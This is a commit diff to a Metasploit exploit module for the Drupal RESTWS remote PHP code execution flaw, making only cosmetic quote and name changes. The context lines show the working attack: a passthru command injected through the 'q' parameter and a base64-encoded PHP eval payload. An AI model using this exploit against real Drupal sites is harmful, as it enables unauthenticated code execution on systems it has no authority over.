@@ -10,7 +10,7 @@ class MetasploitModule < Msf::Exploit::Remote
10
10
11
11
def initialize ( info = { } )
12
12
super ( update_info ( info ,
13
- 'Name' => 'Drupal RESTWS Module 7.x Remote PHP Code Execution' ,
13
+ 'Name' => 'Drupal RESTWS Module Remote PHP Code Execution' ,
14
14
'Description' => %q{
15
15
This module exploits a Remote PHP Code Execution vulnerability in
16
16
Drupal RESTWS Module. Unauthenticated users can execute arbitrary code
@@ -48,7 +48,7 @@ def initialize(info={})
48
48
49
49
register_options (
50
50
[
51
- OptString . new ( 'TARGETURI' , [ true , " The target URI of the Drupal installation" , '/' ] )
51
+ OptString . new ( 'TARGETURI' , [ true , ' The target URI of the Drupal installation' , '/' ] )
52
52
]
53
53
)
54
54
end
@@ -57,7 +57,7 @@ def check
57
57
r = rand_text_alpha ( 8 + rand ( 4 ) )
58
58
res = send_request_cgi (
59
59
'method' => 'GET' ,
60
- 'uri' => normalize_uri ( target_uri . path , " index.php" ) ,
60
+ 'uri' => normalize_uri ( target_uri . path , ' index.php' ) ,
61
61
'vars_get' => {
62
62
'q' => "taxonomy_vocabulary//passthru/echo #{ r } "
63
63
}
@@ -73,7 +73,7 @@ def exploit
73
73
cmd = "php -r 'eval(base64_decode(\" #{ Rex ::Text . encode_base64 ( payload . encoded ) } \" ));'"
74
74
send_request_cgi (
75
75
'method' => 'GET' ,
76
- 'uri' => normalize_uri ( target_uri . path , " index.php" ) ,
76
+ 'uri' => normalize_uri ( target_uri . path , ' index.php' ) ,
77
77
'vars_get' => {
78
78
'q' => "taxonomy_vocabulary//passthru/#{ cmd } "
79
79
}
0 commit comments